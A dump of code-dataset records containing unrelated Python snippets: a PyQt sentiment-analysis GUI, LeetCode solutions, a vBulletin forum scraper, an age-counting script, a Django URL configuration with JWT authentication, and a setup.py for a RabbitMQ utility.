self.pronoun_checkbox.setFont(font)\n self.pronoun_checkbox.setObjectName(\"pronoun_checkbox\")\n\n # Add pronoun checkbox to first vertical layout\n self.vertical_layout_1.addWidget(self.pronoun_checkbox)\n\n # Create lexical checkbox\n self.lexical_checkbox = QtWidgets.QCheckBox(self.vertical_layout_widget_1)\n self.lexical_checkbox.setFont(font)\n self.lexical_checkbox.setObjectName(\"lexical_checkbox\")\n\n # Add lexical checkbox to first vertical layout\n self.vertical_layout_1.addWidget(self.lexical_checkbox)\n\n # Create rule based checkbox\n self.rule_based_checkbox = QtWidgets.QCheckBox(self.vertical_layout_widget_1)\n self.rule_based_checkbox.setFont(font)\n self.rule_based_checkbox.setObjectName(\"rule_based_checkbox\")\n\n # Add rule_based checkbox to first vertical layout\n self.vertical_layout_1.addWidget(self.rule_based_checkbox)\n\n # Create machine learning checkbox\n self.machine_learning_checkbox = QtWidgets.QCheckBox(self.vertical_layout_widget_1)\n self.machine_learning_checkbox.setFont(font)\n self.machine_learning_checkbox.setObjectName(\"machine_learning_checkbox\")\n\n # Add machine learning checkbox to first vertical 
layout\n self.vertical_layout_1.addWidget(self.machine_learning_checkbox)\n\n # Create help scroll box\n self.help_scroll_box = QtWidgets.QScrollArea(self.main_window)\n self.help_scroll_box.setGeometry(QtCore.QRect(280, 260, 160, 140))\n self.help_scroll_box.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.help_scroll_box.setFrameShadow(QtWidgets.QFrame.Sunken)\n self.help_scroll_box.setWidgetResizable(True)\n self.help_scroll_box.setObjectName(\"help_scroll_box\")\n\n # Create help content\n self.help_content = QtWidgets.QWidget()\n self.help_content.setGeometry(QtCore.QRect(0, 0, 158, 138))\n self.help_content.setObjectName(\"help_content\")\n self.help_scroll_box.setWidget(self.help_content)\n\n # Create selected files variable\n self.selected_files = {}\n\n # Set current tab\n self.input_output_box.setCurrentIndex(0)\n\n # Retranslate UI\n self.retranslateUI()\n\n # Connect UI slots\n QtCore.QMetaObject.connectSlotsByName(self.main_window)\n\n # ============================================== #\n\n # Define retranslateUI function\n def retranslateUI(self):\n # Add text to ui elements\n _translate = QtCore.QCoreApplication.translate\n self.main_window.setWindowTitle(_translate(\"main_window\", \"SentiCompare\"))\n self.add_button.setText(_translate(\"main_window\", \"Add\"))\n self.delete_button.setText(_translate(\"main_window\", \"Delete\"))\n self.input_output_box.setTabText(self.input_output_box.indexOf(self.select_files_tab),\n _translate(\"main_window\", \"Select Files\"))\n self.input_output_box.setTabText(self.input_output_box.indexOf(self.manual_input_tab),\n _translate(\"main_window\", \"Manual Input\"))\n self.input_output_box.setTabText(self.input_output_box.indexOf(self.results_tab),\n _translate(\"main_window\", \"Results\"))\n self.run_button.setText(_translate(\"main_window\", \"Run\"))\n self.quit_button.setText(_translate(\"main_window\", \"Quit\"))\n self.pronoun_checkbox.setText(_translate(\"main_window\", \"Pronoun Usage\"))\n self.lexical_checkbox.setText(_translate(\"main_window\", \"Lexical\"))\n self.rule_based_checkbox.setText(_translate(\"main_window\", \"Rule Based\"))\n self.machine_learning_checkbox.setText(_translate(\"main_window\", \"Machine Learning\"))\n self.branding_label.setText(_translate(\"main_window\", \"SentiCompare\"))\n\n # ============================================== #\n\n # Define showWindow function\n def showWindow(self):\n self.main_window.show()\n\n # ============================================== #\n\n # Define selectFiles function\n def selectFiles(self):\n # Create file dialog\n file_dialog = FileDialog(self.main_window)\n file_dialog.setFilters([\"Text files (*.txt)\"])\n file_dialog.setDefaultFilterIndex = 0\n file_dialog.setDefaultDirectory(os.path.expanduser('~'))\n file_dialog.exec()\n\n # Return if nothing was selected\n if file_dialog.getPath() == '':\n return\n\n # Add files from selected directory to file list\n elif file_dialog.getFilename()[2] == '':\n for file in os.listdir(file_dialog.getPath()):\n if file.endswith('.txt') and not file.startswith('.'):\n file_path = os.path.join(file_dialog.getPath(), file)\n\n if file_path not in self.selected_files:\n self.selected_files[file] = file_path\n\n item = QStandardItem(file)\n item.setCheckable(True)\n self.file_view_model.appendRow(item)\n\n # Add selected file to list\n else:\n if file_dialog.getPath() not in self.selected_files:\n self.selected_files[file_dialog.getFilename()[1]] = file_dialog.getPath()\n\n item = QStandardItem(file_dialog.getFilename()[1])\n 
item.setCheckable(True)\n self.file_view_model.appendRow(item)\n\n # ============================================== #\n\n # Define removeFiles function\n def removeFiles(self):\n # Remove all checked files\n for i in range(self.file_view_model.rowCount() - 1, -1, -1):\n if self.file_view_model.item(i).checkState():\n filename = self.file_view_model.item(i).text()\n del self.selected_files[filename]\n self.file_view_model.removeRow(i)\n\n # ============================================== #\n\n # Define run function\n def run(self):\n # Check if an analysis method is selected\n if not (self.pronoun_checkbox.isChecked() or self.lexical_checkbox.isChecked() or\n self.rule_based_checkbox.isChecked() or self.machine_learning_checkbox.isChecked()):\n # Create and show an error message\n message_box = QMessageBox()\n message_box.setIcon(QMessageBox.Warning)\n message_box.setWindowTitle(\"Missing Parameters\")\n message_box.setText(\"You haven't selected any methods of sentiment analysis. Please select at least one \" +\n \"method from the list of options.\")\n message_box.exec_()\n return\n\n # Check if the current tab is valid\n if self.input_output_box.currentIndex() == 2:\n # Create and show error message\n message_box = QMessageBox()\n message_box.setIcon(QMessageBox.Warning)\n message_box.setWindowTitle(\"Select Input\")\n message_box.setText(\"You must be on the \\\"Select Files\\\" page or the \\\"Manual Input\\\" page to run \" +\n \"an analysis. Please select one of those pages and try again.\")\n message_box.exec_()\n return\n\n else:\n progress_bar = QtWidgets.QProgressDialog(\"Running Sentiment Analysis...\", \"Cancel\", 0, 100, self.main_window)\n progress_bar.setValue(0)\n progress_bar.setCancelButton(None)\n progress_bar.setWindowModality(QtCore.Qt.WindowModal)\n progress_bar.resize(400, 50)\n progress_bar.show()\n\n # Analyze selected files\n if self.input_output_box.currentIndex() == 0:\n sentiment_analyzer = SentimentAnalyzer(self.selected_files, progress_bar, pronoun=self.pronoun_checkbox.isChecked(),\n lexical=self.lexical_checkbox.isChecked(),\n rule_based=self.rule_based_checkbox.isChecked(),\n machine_learning=self.machine_learning_checkbox.isChecked())\n\n # Analyze manual input\n else:\n sentiment_analyzer = SentimentAnalyzer(self.text_input.toPlainText(), progress_bar, pronoun=self.pronoun_checkbox.isChecked(),\n lexical=self.lexical_checkbox.isChecked(),\n rule_based=self.rule_based_checkbox.isChecked(),\n machine_learning=self.machine_learning_checkbox.isChecked())\n\n results = sentiment_analyzer.runAnalyses()\n progress_bar.close()\n\n if results:\n self.results_content_text.setText(results)\n self.input_output_box.setTabEnabled(2, True)\n self.input_output_box.setCurrentIndex(2)\n\n else:\n message_box = QMessageBox()\n message_box.setIcon(QMessageBox.Warning)\n message_box.setWindowTitle(\"Missing Input\")\n message_box.setText(\"You haven't added any input to analyze. Please select one or more files or \" +\n \"input some data manually.\")\n message_box.exec_()\n return\n\n# ================================================== #\n# EOF #\n# ================================================== #\n",
"step-ids": [
4,
6,
7,
8,
9
]
}
|
[
4,
6,
7,
8,
9
] |
class Solution(object):
def minimumTotal(self, triangle):
"""
:type triangle: List[List[int]]
:rtype: int
"""
t = triangle
if len(t) == 1:
return t[0][0]
ret = [0] * len(t)
ret[0] = t[0][0]
for i in range(1, len(t)):
for j in range(0, i + 1):
if j == 0:
old_v = ret[j]
ret[j] += t[i][j]
elif j == i:
ret[j] = old_v + t[i][j]
else:
val = min(old_v + t[i][j], ret[j] + t[i][j])
old_v = ret[j]
ret[j] = val
return min(ret)
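# Illustrative usage (assumed example, not part of the original snippet):
#   Solution().minimumTotal([[2], [3, 4], [6, 5, 7], [4, 1, 8, 3]])  # -> 11
#   The cheapest top-to-bottom path is 2 -> 3 -> 5 -> 1; the method keeps a
#   single rolling row (ret) and updates it in place for each triangle level.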
|
normal
|
{
"blob_id": "84515ef6879b54b333f9afd48c6c4b7c43ff6957",
"index": 1068,
"step-1": "<mask token>\n",
"step-2": "class Solution(object):\n <mask token>\n",
"step-3": "class Solution(object):\n\n def minimumTotal(self, triangle):\n \"\"\"\n :type triangle: List[List[int]]\n :rtype: int\n \"\"\"\n t = triangle\n if len(t) == 1:\n return t[0][0]\n ret = [0] * len(t)\n ret[0] = t[0][0]\n for i in range(1, len(t)):\n for j in range(0, i + 1):\n if j == 0:\n old_v = ret[j]\n ret[j] += t[i][j]\n elif j == i:\n ret[j] = old_v + t[i][j]\n else:\n val = min(old_v + t[i][j], ret[j] + t[i][j])\n old_v = ret[j]\n ret[j] = val\n return min(ret)\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
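The triangle solution in the record above rolls a single array over the rows: `old_v` keeps the previous row's value for the column that is about to be overwritten, so each row is updated in place with O(n) extra space. A quick sanity check, assuming the `Solution` class from the record is defined in the same module:

# Sanity check for the rolling-array triangle DP above (class assumed importable as-is).
triangle = [[2], [3, 4], [6, 5, 7], [4, 1, 8, 3]]
solver = Solution()
assert solver.minimumTotal(triangle) == 11      # path 2 -> 3 -> 5 -> 1
assert solver.minimumTotal([[-10]]) == -10      # single-row early return
print("minimumTotal sanity checks passed")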
"""This file parses vbulletin forums"""
import re
import logging
from BeautifulSoup import BeautifulSoup as bs
import imaget
import pdb
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
date_marker = ["<!-- status icon and date -->", "<!-- / status icon and date -->"]
message_marker = ["<!-- message -->", "<!-- / message -->"]
sig_marker = ["<!-- sig -->", "<!-- / sig -->"]
edit_marker = ["<!-- edit note -->", "<!-- / edit note -->"]
def get_subforums(main_soup):
subforums = main_soup.findAll('td', attrs={'class':'alt1Active'})
sublinks = []
for s in subforums:
links = s.findAll('a')
for a in links:
if not "http" in a['href']:
break
link = a['href']
text = a.getText()
sublinks.append({'name':text, 'link':link})
return sublinks
def get_threads(subforum_soup):
"""This function gets information on the threads from the subforum page. It also returns the total number of pages"""
threads = subforum_soup.findAll('a', attrs={'id':lambda x:x and x.startswith('thread_title')}) #pulls out the thread links
#page _ of _
page = 1
page_count = subforum_soup.find('td', attrs={'class':'vbmenu_control'})
if page_count:
page_count = page_count.getText()
page_match = re.search(r'(\d+) .+? (\d+)', page_count)
if page_match:
page_count = int(page_match.group(2))
page = int(page_match.group(1))
logger.debug("get_threads: page_count = %d, page = %d" % (page_count, page))
else:
page_count = 1
page = 1
thread_counts = subforum_soup.findAll('td', attrs={'class':'alt2', 'title':lambda x:x and re.match(r'.+?: \d+?', x)})
if len(threads) != len(thread_counts):
logger.error('get_threads: thread-count mismatch. Threads = %d; thread_counts = %d' % (len(threads), len(thread_counts)))
logger.debug('get_threads: threads = %s' % str(threads))
logger.debug('get_threads: thread_counts = %s' % str(thread_counts))
threadlinks = []
for i in range(min(len(threads), len(thread_counts))):
t = threads[i]
c = thread_counts[i]
sanatized = c['title'].replace(',', '')
count = int(re.search(r'.+?: (\d+?) .+?: (\d+?)',sanatized).group(1)) + 1
text = t.getText()
link = t['href']
threadlinks.append({'name':text, 'link':link, 'count':count})
return threadlinks, (page, page_count)
def get_page(thread_url, pagenum):
return thread_url + "&page=" + str(pagenum)
def get_posts(page_soup):
page_soup = bs(page_soup)
#page _ of _
page_count = page_soup.find('td', attrs={'class':'vbmenu_control'})
if page_count:
page_count = page_count.getText()
page_match = re.search(r'(\d+) .+? (\d+)', page_count)
if page_match:
page_count = int(page_match.group(2))
page = int(page_match.group(1))
else:
page_count = 1
page = 1
posts = page_soup.findAll('table', attrs={'id':lambda x: x and re.match(r'post', x)})
logging.info('get_post: got %d posts' % len(posts))
post_list = []
for p in posts:
post_link = p.find('a', attrs={'name': lambda x: x and re.match(r'\d+', x)})['href']
post_string = str(p)
raw_message = extract(post_string, message_marker[0], message_marker[1])
date = extract(post_string, date_marker[0], date_marker[1])
date = strip_tags(date).strip()
message = get_message(raw_message)
sig = extract(post_string, sig_marker[0], sig_marker[1])
edit = extract(post_string, edit_marker[0], edit_marker[1])
msg_image_srcs = imaget.get_image_src(raw_message)
if msg_image_srcs: msg_image_srcs = msg_image_srcs[0]
print "message source: "
print msg_image_srcs
print "\n\n\n"
user = get_user(post_string, sig)
post_list.append({'date': date, 'message': message, 'edit': edit, 'message images': msg_image_srcs, 'user': user, 'link': post_link})
return post_list, (page, page_count)
def get_user(post_string, sig = ""):
user_tag = bs(post_string).find('td', attrs={'class':'alt2'})
user_link = user_tag.find('a', attrs={'class':'bigusername'})
if not user_link: return {'tag': user_tag, 'name': 'guest', 'link': None, 'join': None, 'sig': None, 'image': None, 'title': 'guest'}
user_name = user_link.getText()
user_link = user_link['href']
user_title = user_tag.findAll('div')[1].getText()
user_div = user_tag.findAll('div')
inner_ind = 2
while len(user_div[inner_ind].findAll('div'))<3:
inner_ind+=1
inner_name_soup = user_div[inner_ind].findAll('div')
join_date = inner_name_soup[0].getText()[len("Join Date: "):]
user_image_src = imaget.get_image_src(user_tag, 1)
return {'tag': user_tag, 'name':user_name, 'link': user_link, 'title': user_title, 'join': join_date, 'sig': sig, 'image': user_image_src}
def get_message(message_str):
message_soup = bs(message_str)
images = message_soup.findAll('img')
for item in images:
item.extract()
scripts = message_soup.findAll('script')
for item in scripts:
item.extract()
return str(message_soup)
def extract(string, start_marker, end_marker):
"""wrapper function for slicing into a string"""
start_loc = string.find(start_marker)
end_loc = string.find(end_marker)
if start_loc == -1 or end_loc == -1:
return ""
return string[start_loc+len(start_marker):end_loc]
def strip_tags(source):
return re.sub(r'<.+?>', '', source)
|
normal
|
{
"blob_id": "0846f73482ad86158c3f4e37713d6d965e21d796",
"index": 2671,
"step-1": "\"\"\"This file parses vbulletin forums\"\"\"\n\nimport re\nimport logging\nfrom BeautifulSoup import BeautifulSoup as bs\nimport imaget\nimport pdb\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\n\n\ndate_marker = [\"<!-- status icon and date -->\", \"<!-- / status icon and date -->\"]\nmessage_marker = [\"<!-- message -->\", \"<!-- / message -->\"]\nsig_marker = [\"<!-- sig -->\", \"<!-- / sig -->\"]\nedit_marker = [\"<!-- edit note -->\", \"<!-- / edit note -->\"]\n\n\n\ndef get_subforums(main_soup):\n\n subforums = main_soup.findAll('td', attrs={'class':'alt1Active'})\n sublinks = []\n for s in subforums:\n links = s.findAll('a')\n for a in links:\n if not \"http\" in a['href']:\n break\n link = a['href']\n text = a.getText()\n sublinks.append({'name':text, 'link':link})\n\n return sublinks\n\n\ndef get_threads(subforum_soup):\n \"\"\"This function gets information on the threads from the subforum page. It also returns the total number of pages\"\"\"\n threads = subforum_soup.findAll('a', attrs={'id':lambda x:x and x.startswith('thread_title')}) #pulls out the thread links\n\n #page _ of _\n page = 1\n page_count = subforum_soup.find('td', attrs={'class':'vbmenu_control'})\n if page_count:\n page_count = page_count.getText()\n page_match = re.search(r'(\\d+) .+? (\\d+)', page_count)\n if page_match:\n page_count = int(page_match.group(2))\n page = int(page_match.group(1))\n logger.debug(\"get_threads: page_count = %d, page = %d\" % (page_count, page))\n else:\n page_count = 1\n page = 1\n\n thread_counts = subforum_soup.findAll('td', attrs={'class':'alt2', 'title':lambda x:x and re.match(r'.+?: \\d+?', x)})\n if len(threads) != len(thread_counts):\n logger.error('get_threads: thread-count mismatch. Threads = %d; thread_counts = %d' % (len(threads), len(thread_counts)))\n logger.debug('get_threads: threads = %s' % str(threads))\n\tlogger.debug('get_threads: thread_counts = %s' % str(thread_counts))\n threadlinks = []\n for i in range(min(len(threads), len(thread_counts))):\n t = threads[i]\n c = thread_counts[i]\n sanatized = c['title'].replace(',', '')\n count = int(re.search(r'.+?: (\\d+?) .+?: (\\d+?)',sanatized).group(1)) + 1\n text = t.getText()\n link = t['href']\n threadlinks.append({'name':text, 'link':link, 'count':count})\n return threadlinks, (page, page_count)\n\ndef get_page(thread_url, pagenum):\n return thread_url + \"&page=\" + str(pagenum)\n\ndef get_posts(page_soup):\n\n page_soup = bs(page_soup)\n\n\n #page _ of _\n page_count = page_soup.find('td', attrs={'class':'vbmenu_control'})\n if page_count:\n page_count = page_count.getText()\n page_match = re.search(r'(\\d+) .+? 
(\\d+)', page_count)\n if page_match:\n page_count = int(page_match.group(2))\n page = int(page_match.group(1))\n else:\n page_count = 1\n page = 1\n posts = page_soup.findAll('table', attrs={'id':lambda x: x and re.match(r'post', x)})\n logging.info('get_post: got %d posts' % len(posts))\n post_list = []\n for p in posts:\n post_link = p.find('a', attrs={'name': lambda x: x and re.match(r'\\d+', x)})['href']\n post_string = str(p)\n raw_message = extract(post_string, message_marker[0], message_marker[1])\n\n date = extract(post_string, date_marker[0], date_marker[1])\n date = strip_tags(date).strip()\n message = get_message(raw_message)\n sig = extract(post_string, sig_marker[0], sig_marker[1])\n edit = extract(post_string, edit_marker[0], edit_marker[1])\n\n msg_image_srcs = imaget.get_image_src(raw_message)\n if msg_image_srcs: msg_image_srcs = msg_image_srcs[0]\n print \"message source: \" \n print msg_image_srcs\n print \"\\n\\n\\n\"\n\n user = get_user(post_string, sig)\n\n post_list.append({'date': date, 'message': message, 'edit': edit, 'message images': msg_image_srcs, 'user': user, 'link': post_link})\n\n return post_list, (page, page_count)\n\n\n\ndef get_user(post_string, sig = \"\"):\n\n user_tag = bs(post_string).find('td', attrs={'class':'alt2'})\n user_link = user_tag.find('a', attrs={'class':'bigusername'})\n if not user_link: return {'tag': user_tag, 'name': 'guest', 'link': None, 'join': None, 'sig': None, 'image': None, 'title': 'guest'}\n user_name = user_link.getText()\n user_link = user_link['href']\n user_title = user_tag.findAll('div')[1].getText()\n \n user_div = user_tag.findAll('div')\n inner_ind = 2\n while len(user_div[inner_ind].findAll('div'))<3:\n inner_ind+=1\n inner_name_soup = user_div[inner_ind].findAll('div')\n join_date = inner_name_soup[0].getText()[len(\"Join Date: \"):]\n\n user_image_src = imaget.get_image_src(user_tag, 1)\n\n return {'tag': user_tag, 'name':user_name, 'link': user_link, 'title': user_title, 'join': join_date, 'sig': sig, 'image': user_image_src}\n\n \n \n\ndef get_message(message_str):\n message_soup = bs(message_str)\n images = message_soup.findAll('img')\n for item in images:\n item.extract()\n scripts = message_soup.findAll('script')\n for item in scripts:\n item.extract()\n return str(message_soup)\n \n \n\ndef extract(string, start_marker, end_marker):\n \"\"\"wrapper function for slicing into a string\"\"\"\n start_loc = string.find(start_marker)\n end_loc = string.find(end_marker)\n if start_loc == -1 or end_loc == -1:\n return \"\"\n return string[start_loc+len(start_marker):end_loc]\n\ndef strip_tags(source):\n return re.sub(r'<.+?>', '', source) \n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
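The parser in the record above targets Python 2 and BeautifulSoup 3 (`from BeautifulSoup import BeautifulSoup`, bare `print` statements), and its central trick is slicing the raw post HTML between vBulletin's HTML-comment markers instead of walking the DOM. A self-contained Python 3 sketch of that marker-slicing pair, with purely illustrative markup:

# Python 3 sketch of the comment-marker slicing used by get_posts() above;
# the sample HTML is illustrative, not taken from a real forum page.
import re

def extract(string, start_marker, end_marker):
    """Return the text between two markers, or '' if either marker is missing."""
    start_loc = string.find(start_marker)
    end_loc = string.find(end_marker)
    if start_loc == -1 or end_loc == -1:
        return ""
    return string[start_loc + len(start_marker):end_loc]

def strip_tags(source):
    return re.sub(r"<.+?>", "", source)

post_html = "<td><!-- message --><div>Hello <b>world</b></div><!-- / message --></td>"
raw = extract(post_html, "<!-- message -->", "<!-- / message -->")
print(strip_tags(raw).strip())  # -> Hello world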
from datetime import date
atual = date.today().year
totmaior = 0
totmenor = 0
for pessoas in range(1, 8):
nasc = int(input(f'Qual sua data de nascimento? {pessoas}º: '))
idade = atual - nasc
if idade >= 21:
totmaior += 1
else:
totmenor += 1
print(f'Ao todo tivemos {totmaior} pessoas maiores de idade!')
print(f'E tambem tivemos {totmenor} pessoas menores de idade!')
|
normal
|
{
"blob_id": "f6d7ce2d020d11086640a34aac656098ab0b0f33",
"index": 9495,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor pessoas in range(1, 8):\n nasc = int(input(f'Qual sua data de nascimento? {pessoas}º: '))\n idade = atual - nasc\n if idade >= 21:\n totmaior += 1\n else:\n totmenor += 1\nprint(f'Ao todo tivemos {totmaior} pessoas maiores de idade!')\nprint(f'E tambem tivemos {totmenor} pessoas menores de idade!')\n",
"step-3": "<mask token>\natual = date.today().year\ntotmaior = 0\ntotmenor = 0\nfor pessoas in range(1, 8):\n nasc = int(input(f'Qual sua data de nascimento? {pessoas}º: '))\n idade = atual - nasc\n if idade >= 21:\n totmaior += 1\n else:\n totmenor += 1\nprint(f'Ao todo tivemos {totmaior} pessoas maiores de idade!')\nprint(f'E tambem tivemos {totmenor} pessoas menores de idade!')\n",
"step-4": "from datetime import date\natual = date.today().year\ntotmaior = 0\ntotmenor = 0\nfor pessoas in range(1, 8):\n nasc = int(input(f'Qual sua data de nascimento? {pessoas}º: '))\n idade = atual - nasc\n if idade >= 21:\n totmaior += 1\n else:\n totmenor += 1\nprint(f'Ao todo tivemos {totmaior} pessoas maiores de idade!')\nprint(f'E tambem tivemos {totmenor} pessoas menores de idade!')\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# -*- coding:utf-8 -*-
# Author: washing
# DateTime: 2022/5/18 10:28
# File: 0668.py
# Desc: CV
from bisect import bisect_left  # needed by the one-liner below; its key= argument requires Python 3.10+


class Solution:
def findKthNumber(self, m: int, n: int, k: int) -> int:
return bisect_left(range(m * n), k, key=lambda x: x // n * n + sum(x // i for i in range(x // n + 1, m + 1)))
|
normal
|
{
"blob_id": "ec9efeca7eef7b8ee25c1e089e675bdb1e53413b",
"index": 417,
"step-1": "<mask token>\n",
"step-2": "class Solution:\n <mask token>\n",
"step-3": "class Solution:\n\n def findKthNumber(self, m: int, n: int, k: int) ->int:\n return bisect_left(range(m * n), k, key=lambda x: x // n * n + sum(\n x // i for i in range(x // n + 1, m + 1)))\n",
"step-4": "# -*- coding:utf-8 -*-\r\n# Author: washing\r\n# DateTime: 2022/5/18 10:28\r\n# File: 0668.py\r\n# Desc: CV\r\n\r\nclass Solution:\r\n def findKthNumber(self, m: int, n: int, k: int) -> int:\r\n return bisect_left(range(m * n), k, key=lambda x: x // n * n + sum(x // i for i in range(x // n + 1, m + 1)))\r\n\r\n\r\n\r\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
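The one-liner in the record above binary-searches the answer to LeetCode 668 (k-th smallest value in an m x n multiplication table); the `key` callable counts how many table entries are at most x, and that count is monotone in x. Note that `bisect_left`'s `key` argument needs Python 3.10 or newer. An expanded, self-contained version of the same idea with a small check:

# Expanded form of the bisect one-liner above: count_le(x) is the number of
# entries of the m x n multiplication table that are <= x, so bisect_left
# finds the smallest x whose count reaches k.
from bisect import bisect_left

def count_le(x: int, m: int, n: int) -> int:
    # Rows 1..x//n lie entirely at or below x (n entries each);
    # every later row i contributes x // i entries.
    return x // n * n + sum(x // i for i in range(x // n + 1, m + 1))

def find_kth_number(m: int, n: int, k: int) -> int:
    return bisect_left(range(m * n), k, key=lambda x: count_le(x, m, n))

assert find_kth_number(3, 3, 5) == 3   # table values sorted: 1,2,2,3,3,4,6,6,9
assert find_kth_number(2, 3, 6) == 6   # largest value is returned when k = m*n
print("find_kth_number checks passed")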
"""lendbooks URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.10/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
from rest_framework_jwt.views import obtain_jwt_token
urlpatterns = [
url(r'^admin/', admin.site.urls), # Django Admin
url(r'^', include('books.urls')), # Books Management
url(r'^', include('borrowed_books.urls')), # Borrow Books
url(r'^', include('reviews.urls')), # Reviews
url(r'^', include('api_root.urls')),
url(r'^api-token-auth/', obtain_jwt_token), # JWT
url(r'^', include('django.contrib.auth.urls')), # Django's own Auth'
url(r'^account/', include('rest_auth.urls')), # Account Management
url(r'^account/registration/', include('rest_auth.registration.urls')), # Account Registration
]
urlpatterns += [
url(r'^api-auth/', include('rest_framework.urls',
namespace='rest_framework')),
]
|
normal
|
{
"blob_id": "9e950f6fe895cfd497e94139397e8a0f19725dc0",
"index": 1902,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns += [url('^api-auth/', include('rest_framework.urls', namespace=\n 'rest_framework'))]\n",
"step-3": "<mask token>\nurlpatterns = [url('^admin/', admin.site.urls), url('^', include(\n 'books.urls')), url('^', include('borrowed_books.urls')), url('^',\n include('reviews.urls')), url('^', include('api_root.urls')), url(\n '^api-token-auth/', obtain_jwt_token), url('^', include(\n 'django.contrib.auth.urls')), url('^account/', include('rest_auth.urls'\n )), url('^account/registration/', include('rest_auth.registration.urls'))]\nurlpatterns += [url('^api-auth/', include('rest_framework.urls', namespace=\n 'rest_framework'))]\n",
"step-4": "<mask token>\nfrom django.conf.urls import url, include\nfrom django.contrib import admin\nfrom rest_framework_jwt.views import obtain_jwt_token\nurlpatterns = [url('^admin/', admin.site.urls), url('^', include(\n 'books.urls')), url('^', include('borrowed_books.urls')), url('^',\n include('reviews.urls')), url('^', include('api_root.urls')), url(\n '^api-token-auth/', obtain_jwt_token), url('^', include(\n 'django.contrib.auth.urls')), url('^account/', include('rest_auth.urls'\n )), url('^account/registration/', include('rest_auth.registration.urls'))]\nurlpatterns += [url('^api-auth/', include('rest_framework.urls', namespace=\n 'rest_framework'))]\n",
"step-5": "\"\"\"lendbooks URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.10/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url, include\nfrom django.contrib import admin\nfrom rest_framework_jwt.views import obtain_jwt_token\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls), # Django Admin\n url(r'^', include('books.urls')), # Books Management\n url(r'^', include('borrowed_books.urls')), # Borrow Books\n url(r'^', include('reviews.urls')), # Reviews\n url(r'^', include('api_root.urls')), \n url(r'^api-token-auth/', obtain_jwt_token), # JWT\n url(r'^', include('django.contrib.auth.urls')), # Django's own Auth'\n url(r'^account/', include('rest_auth.urls')), # Account Management\n url(r'^account/registration/', include('rest_auth.registration.urls')), # Account Registration\n]\n\nurlpatterns += [\n url(r'^api-auth/', include('rest_framework.urls',\n namespace='rest_framework')),\n]\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
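In the URLconf above, `api-token-auth/` is wired to `rest_framework_jwt`'s `obtain_jwt_token`, which by default returns a JSON body of the form `{"token": "..."}` and expects the `JWT <token>` authorization prefix. An illustrative client call, where the host and credentials are placeholders and only the path comes from the URLconf:

# Illustrative token flow against the routes declared above; host, username and
# password are placeholders, only the /api-token-auth/ path is from the URLconf.
import requests

BASE = "http://localhost:8000"
resp = requests.post(f"{BASE}/api-token-auth/",
                     json={"username": "demo", "password": "demo-password"})
resp.raise_for_status()
token = resp.json()["token"]            # rest_framework_jwt's default response shape
books = requests.get(f"{BASE}/", headers={"Authorization": f"JWT {token}"})
print(books.status_code)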
# -*- coding: utf-8 -*-
import sys
import setuptools
from distutils.core import setup
with open("README.md", "r") as fh:
long_description = fh.read()
def get_info():
init_file = 'PIKACHU/__init__.py'
with open(init_file, 'r') as f:
for line in f.readlines():
if "=" in line:
exec(compile(line, "", 'exec'))
return locals()['name'], locals()['author'], locals()['version']
NAME, AUTHOR, VERSION = get_info()
sys.dont_write_bytecode = True
setuptools.setup(
name=NAME,
version=VERSION,
author=AUTHOR,
author_email="[email protected]",
description="a PIKA based, Cuter and more Human rabbitmq queue Utility (´_ゝ`)",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/smilefufu/PIKACHU",
data_files = [("", ["LICENSE"])],
packages=setuptools.find_packages(),
install_requires=[
"pika",
],
classifiers=(
'License :: OSI Approved :: BSD License',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Operating System :: OS Independent'
),
)
|
normal
|
{
"blob_id": "f14ff29a1a76c2916cb211c476a56aaa5061bf71",
"index": 8837,
"step-1": "<mask token>\n\n\ndef get_info():\n init_file = 'PIKACHU/__init__.py'\n with open(init_file, 'r') as f:\n for line in f.readlines():\n if '=' in line:\n exec(compile(line, '', 'exec'))\n return locals()['name'], locals()['author'], locals()['version']\n\n\n<mask token>\n",
